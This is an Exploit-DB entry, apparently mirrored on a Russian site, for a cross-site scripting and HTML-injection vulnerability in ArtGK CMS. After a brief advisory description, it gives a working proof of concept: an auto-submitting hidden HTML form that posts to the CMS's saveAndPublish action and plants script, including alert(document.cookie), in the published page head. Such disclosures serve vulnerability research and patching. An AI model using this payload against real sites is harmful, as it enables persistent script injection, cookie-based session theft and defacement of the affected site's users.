- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 34560
- Проверка EDB
-
- Пройдено
- Автор
- HIGH-TECH BRIDGE SA
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2010-09-01
ArtGK CMS - Cross-Site Scripting / HTML Injection
HTML:
source: https://www.securityfocus.com/bid/42923/info
ArtGK CMS is prone to a cross-site scripting vulnerability and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
<form action="http://host/cms/action?async=exit" method="post" name="main" > <input type="hidden" name="_a[0][action]" value="saveAndPublish" /> <input type="hidden" name="_a[0][id]" value="1" /> <input type="hidden" name="_a[0][vars][title]" value="page title" /> <input type="hidden" name="_a[0][vars][description]" value="description" /> <input type="hidden" name="_a[0][vars][keywords]" value="metakeys" /> <input type="hidden" name="_a[0][vars][link]" value="/" /> <input type="hidden" name="_a[0][vars][use_content_in_head]" value="path" /> <input type="hidden" name="_a[0][vars][head]" value='<script type="text/javascript" src="/cms/js/ajax.js"> </script><meta name="keywords" content="keywords"/><meta name="description" content="Description"/><script>alert(document.cookie)</script><title>Site Title</title>' /> </form> <script> document.main.submit(); </script>- Источник
- www.exploit-db.com
